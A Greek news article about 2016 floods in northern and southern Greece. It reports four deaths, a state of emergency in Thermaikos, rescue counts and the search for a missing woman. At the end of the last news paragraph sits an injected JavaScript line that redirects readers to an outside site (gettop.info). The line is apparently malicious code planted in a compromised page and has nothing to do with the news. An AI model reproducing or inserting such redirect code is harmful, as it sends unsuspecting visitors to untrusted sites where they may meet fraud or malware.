Τέσσερις νεκροί από τη θεομηνία – Συνεχίζονται οι έρευνες για 53χρονη

0
14

 

Η κατάσταση έκτακτης ανάγκης στον δήμο Θερμαϊκού Θεσσαλονίκης θα ισχύσει για 6 μήνες, έως, δηλαδή, τις 7 Μαρτίου του 2017 μετά τη θεομηνία.

Όπως ανέφερε στο Αθηναϊκό Πρακτορείο ο δήμαρχος Γιάννης Μαυρομάτης, «όσο ο δήμος μας βρίσκεται σε κατάσταση έκτακτης ανάγκης, μπορεί να υλοποιήσει κάποια έργα αποκατάστασης από τις πλημμύρες ξεπερνώντας γραφειοκρατικές διαδικασίες. Τέτοια έργα είναι η αποκατάσταση των ζημιών σε δρόμους ασφαλτοστρωμένους και αγροτικούς, στην παραλία και στα δίκτυα που επλήγησαν καθώς και ο καθαρισμός των ρεμάτων που, λόγω της μεγάλης νεροποντής, έχουν γεμίσει από φερτά υλικά ενώ είχε προηγηθεί καθαρισμός».

Παράλληλα, τόνισε, ότι ο δήμος ζητά δικαίως χρηματοδότηση για να αποκατασταθούν οι ζημιές που έχει υποστεί η περιοχή.

Στο μεταξύ, συνεχίζονται οι έρευνες με πεζές περιπολίες και ειδικά εκπαιδευμένο σκύλο, για τον εντοπισμό 53χρονης γυναίκας η οποία αγνοείται στην περιοχή της Νέας Μηχανιώνας.

«Οι οικείοι της, τα παιδιά της ενημέρωσαν τον επικεφαλής των δυνάμεων της Πυροσβεστικής ότι την αναζητούν και έδωσαν τα χαρακτηριστικά του αυτοκινήτου της. Έχει γίνει μια ανάπτυξη συναδέλφων, περίπου 20 πυροσβεστών οι οποίοι με πεζές αναζητήσεις αλλά και ειδικά εκπαιδευμένο σκύλο προσπαθούν να την εντοπίσουν» ανέφερε στο www.praktoreio-macedonia.gr o Επιχειρησιακός Συντονιστής Πυροσβεστικής στη Θεσσαλονίκη, Δημοσθένης Αναγνωστάκης.

«Οι έρευνες επικεντρώνονται στην παραλία της Νέας Μηχανιώνας, καθώς είναι το τελευταίο στίγμα που έδωσε η γυναίκα στους δύο γιους της. Βέβαια από την ώρα που μίλησε με τα παιδιά της, πιθανότατα να άλλαξαν αυτά τα δεδομένα» επισήμανε ο Επιχειρησιακός Συντονιστής της Πυροσβεστικής.

Συνολικά, τέσσερα άτομα έχασαν τη ζωή τους κατά τη θεομηνία. Συγκεκριμένα τρεις άνθρωποι σκοτώθηκαν στις πλημμύρες ενώ ένας υπέστη καρδιακό πρόβλημα στο σπίτι μου. Επιπλέον, υπάρχει μία αγνοούμενη στην Επανομή Θεσσαλονίκης.

Σύμφωνα με την επίσημη ενημέρωση, από τις πλημμύρες έχασαν τη ζωή τους δύο γυναίκες, στα Πηγάδια Μεσσηνίας και στην Καλαμάτα και ο 90χρονος που εξέπνευσε στο σπίτι του στη Θουρία, ενώ νωρίτερα ανασύρθηκε νεκρός και ένας άνδρας που είχε παρασυρθεί από χείμαρρο στην περιοχή Βλαχιώτη Λακωνίας.

Το Κέντρο Επιχειρήσεων του Πυροσβεστικού Σώματος δέχτηκε εκατοντάδες κλήσεις για πλημμύρες και συγκεκριμένα, 550 στη Θεσσαλονίκη, 350 στη Μεσσηνία και 125 στη Λακωνία.

Τα σωστικά συνεργεία απεγκλώβισαν και διέσωσαν 24 άτομα στον νομό Θεσσαλονίκης, 29 στη Λακωνία και 21 άτομα στη Μεσσηνία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here